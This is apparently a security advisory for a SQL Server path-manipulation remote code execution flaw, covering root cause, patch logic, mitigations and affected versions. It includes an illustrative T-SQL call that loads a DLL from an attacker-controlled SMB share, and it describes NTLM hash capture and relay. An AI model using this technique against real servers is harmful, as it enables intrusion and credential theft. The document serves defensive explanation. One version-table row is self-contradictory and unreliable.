May 20, 2026
A path manipulation flaw (CWE-73) in Microsoft SQL Server allows authenticated, low-privileged users to achieve Remote Code Execution (RCE) via crafted UNC paths or path traversal techniques.
CVE-2026-40370 is a high-severity Remote Code Execution (RCE) vulnerability affecting Microsoft SQL Server versions 2016 through 2025. It stems from improper path validation (CWE-73) in internal stored procedures, allowing an authenticated user with low privileges to execute arbitrary code within the context of the SQL Server service account.
CVE-2026-40370 is a critical security flaw identified in Microsoft SQL Server, spanning multiple major releases from 2016 to 2025. The vulnerability facilitates Remote Code Execution (RCE) by authenticated threat actors possessing low-level access privileges. The issue resides within the database engine's handling of file paths supplied as parameters to various internal functions and stored procedures.
The core of the vulnerability is classified under CWE-73 (External Control of File Name or Path). SQL Server provides several mechanisms for interacting with the underlying file system, typically intended for administrative tasks such as backup operations, bulk data imports, or external script execution. When these interfaces fail to sanitize input boundaries, they expose a direct vector for manipulating server-side file operations.
Exploitation of this flaw allows an attacker to dictate the exact file path the SQL Server process will attempt to read, write, or execute. Because the database engine typically runs under a dedicated, highly privileged service account, successful manipulation results in code execution with those elevated permissions, leading to total compromise of the database environment.
The vulnerability materializes when SQL Server processes external input intended for file system operations without applying strict boundary validation or canonicalization. Specific built-in stored procedures or bulk operation functions accept a string parameter representing a file path. The underlying C++ implementation in the SQL Server engine passes this string to Windows API functions without verifying its structural integrity or destination.
This lack of validation permits two distinct path manipulation strategies. First, an attacker can utilize directory traversal sequences to escape intended working directories, potentially overwriting sensitive configuration files or loading malicious libraries from predictable locations. Second, the engine implicitly supports Universal Naming Convention (UNC) paths, which instruct the operating system to resolve the path over the network rather than the local disk.
When a UNC path is provided, the Windows SMB client initiates a network connection to the specified remote host. If the operation involves loading a dynamic-link library or executing a binary, the SQL Server process retrieves the executable payload from the attacker-controlled SMB share and maps it into its own memory space. The root cause is the failure to explicitly block or filter UNC path formats and directory traversal characters at the parameter ingestion phase.
While Microsoft SQL Server is a closed-source application, the vulnerability can be modeled by analyzing the Transact-SQL (T-SQL) attack surface and the underlying Windows API interactions. The flaw is triggered when an attacker invokes a vulnerable procedure and supplies a maliciously crafted parameter.
```sql
-- Conceptual representation of the vulnerable T-SQL invocation
-- The attacker supplies a UNC path pointing to an external SMB share
EXEC sys.sp_vulnerable_data_operation
    @FilePath = '\\192.168.1.50\public\malicious_payload.dll',
    @Action = 'LOAD';
```

In the vulnerable state, the SQL Server engine extracts the @FilePath variable and executes an internal routine analogous to the LoadLibraryExW Windows API. The operating system resolves the \\192.168.1.50\public share, authenticates using the context of the SQL Server service account, downloads malicious_payload.dll, and executes its entry point (DllMain).
The patched versions introduce strict parameter validation prior to executing file system operations. The remediation logic canonicalizes the input path and verifies it against an authorized list of safe directories (such as the default SQL Server backup or data folders). Furthermore, the update explicitly blocks paths commencing with \\ or containing ..\, terminating the procedure with an error before any network or file handles are opened.
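The canonicalize-then-allow-list check described above can be modelled outside the engine. The Python below is an added example written for this page, not Microsoft's code or the actual fix; the allowed roots are constructed sample values. It goes a little beyond the `\\` / `..\` blocklist the text mentions by failing closed on everything that is not a drive-absolute local path, which also covers forward-slash UNC spellings, `\\?\` device paths and trailing-space tricks.

```python
import ntpath
import re

# Constructed allow-list for this example (not the real patch): the backup and
# data folders the engine is expected to touch.
ALLOWED_ROOTS = (
    r"C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\Backup",
    r"D:\SQLData",
)
# A canonical local path starts with a drive letter, a colon and a backslash.
_DRIVE_ABSOLUTE = re.compile(r"^[a-z]:\\")


def canonicalize(path: str) -> str:
    r"""Normalise a Windows path before comparison: unify separators, collapse
    '.' and '..', drop trailing spaces/dots, lower-case. Device-namespace paths
    (\\?\ and \\.\) are refused because ntpath.normpath passes them through."""
    unified = path.replace("/", "\\")
    if unified.startswith(("\\\\?\\", "\\\\.\\")):
        raise ValueError("device-namespace paths are not accepted")
    # Win32 silently strips trailing spaces and dots from the last component.
    return ntpath.normpath(unified).rstrip(" .").lower()


def validate_file_path(user_path: str, allowed_roots=ALLOWED_ROOTS) -> str:
    r"""Return the canonical path if it lies inside an allowed root, else raise.
    Fails closed: anything that is not a drive-absolute local path (UNC such as
    \\host\share, rooted \Windows, drive-relative C:foo, or relative ..\x) is
    refused before the allow-list is even consulted."""
    if not user_path or "\x00" in user_path:
        raise ValueError("empty path or embedded NUL")
    canonical = canonicalize(user_path)
    if not _DRIVE_ABSOLUTE.match(canonical):
        raise ValueError("only absolute local drive paths are accepted")
    for root in allowed_roots:
        root_c = canonicalize(root).rstrip("\\")
        # Match on a separator boundary so D:\SQLData2 cannot pass as D:\SQLData.
        if canonical.startswith(root_c + "\\"):
            return canonical
    raise ValueError("path is outside the allowed directories")


def is_allowed(user_path: str) -> bool:
    """Accept/reject wrapper; True only when validate_file_path succeeds."""
    try:
        validate_file_path(user_path)
        return True
    except ValueError:
        return False
```

The order matters: the structural check runs before the allow-list, so a UNC path is refused even if an operator later adds an overly broad root.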
Exploitation of CVE-2026-40370 requires the attacker to possess network connectivity to the SQL Server instance and valid authentication credentials. The prerequisite privilege level is low (PR:L), meaning any standard database user account is sufficient to initiate the attack sequence. No user interaction (UI:N) is required from administrators.
The primary attack vector involves standing up an external, attacker-controlled SMB server hosting the exploitation payload. The attacker logs into the SQL Server environment via standard client tools or an existing application proxy and executes the vulnerable stored procedure. The provided argument points directly to the external SMB share.
Upon execution, the SQL Server service attempts to interact with the specified file. If the payload is an executable or a DLL, it is executed natively. Alternatively, if the file interaction only triggers a read/write operation, the attacker can leverage the outbound SMB connection to capture the NetNTLMv2 hash of the SQL Server service account. This hash can subsequently be cracked offline or relayed to other internal services to achieve lateral movement across the domain.
The impact of CVE-2026-40370 is severe, directly compromising the Confidentiality, Integrity, and Availability (C:H/I:H/A:H) of the host system. Successful exploitation grants the attacker arbitrary code execution privileges matching the SQL Server service account. In typical enterprise deployments, this account operates as NT Service\MSSQLSERVER or a highly privileged Active Directory domain account.
Code execution at this level allows the attacker to bypass database-level access controls completely. The threat actor can directly access the physical database files (.mdf, .ldf), extract sensitive information, modify financial or user data without generating standard database audit logs, or permanently destroy the data. The scope remains unchanged (S:U), as the direct compromise is limited to the host running the SQL instance, though the resultant access is absolute.
Beyond the database, the compromised server serves as a powerful pivot point within the internal network. The attacker can deploy post-exploitation frameworks, initiate network discovery scanning, and target adjacent infrastructure. The outbound SMB connection inherent to the vulnerability also introduces the risk of immediate credential theft via NTLM relay attacks.
Immediate application of the official Microsoft Security Updates is the primary remediation strategy. Microsoft released specific Knowledge Base (KB) articles for all supported SQL Server versions on May 12, 2026. Administrators must identify their specific branch and Cumulative Update (CU) or General Distribution Release (GDR) level to apply the correct patch (e.g., KB5089270 for SQL Server 2016 SP3, KB5089899 for SQL Server 2025).
In environments where immediate patching is unfeasible, administrators should implement stringent network-level workarounds. Configuring host-based firewalls (Windows Defender Firewall) or network perimeter firewalls to block outbound SMB traffic (TCP ports 139 and 445) from the SQL Server instances prevents the primary UNC path exploitation vector. This restricts the database engine from initiating connections to external, unauthenticated shares.
Furthermore, organizations must enforce the Principle of Least Privilege across all database environments. Routine audits should verify that standard users do not possess unnecessary EXECUTE permissions on extended stored procedures or bulk data operations. Restricting the file system permissions of the SQL Server service account can also limit the damage of successful local path traversal, preventing the overwriting of critical system files.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C

| Product | Vendor | Affected Versions | Fixed Version |
|---|---|---|---|
| Microsoft SQL Server 2016 SP3 (GDR) | Microsoft | 13.0.0 < 13.0.6490.1 | 13.0.6490.1 |
| Microsoft SQL Server 2016 SP3 Azure Connect | Microsoft | 13.0.0 < 13.0.7085.1 | 13.0.7085.1 |
| Microsoft SQL Server 2017 (CU 31) | Microsoft | 14.0.0 < 14.0.3530.2 | 14.0.3530.2 |
| Microsoft SQL Server 2017 (GDR) | Microsoft | 14.0.0 < 14.0.2110.2 | 14.0.2110.2 |
| Microsoft SQL Server 2019 (CU 32) | Microsoft | 15.0.0.0 < 15.0.4470.1 | 15.0.4470.1 |
| Microsoft SQL Server 2019 (GDR) | Microsoft | 15.0.0 < 15.0.2170.1 | 15.0.2170.1 |
| Microsoft SQL Server 2022 (GDR) | Microsoft | 16.0.0 < 16.0.1180.1 | 16.0.1180.1 |
| Microsoft SQL Server 2022 (CU 24) | Microsoft | 16.0.0.0 < 16.0.4252.3 | 16.0.4252.3 |
| Microsoft SQL Server 2025 (CU 4) | Microsoft | 17.0.4040.1 < 17.0.4040.1 | 17.0.4040.1 |
| Microsoft SQL Server 2025 (GDR) | Microsoft | 17.0.1050.2 < 17.0.1115.1 | 17.0.1115.1 |

| Attribute | Detail |
|---|---|
| CWE ID | CWE-73 |
| Attack Vector | Network |
| CVSS v3.1 Score | 8.8 |
| EPSS Score | 0.00069 (0.07%) |
| Exploit Status | Unexploited / No Public PoC |
| Authentication Required | Low Privileges (PR:L) |
| Primary Impact | Remote Code Execution |
The software allows user input to control or influence paths or file names that are used in filesystem operations.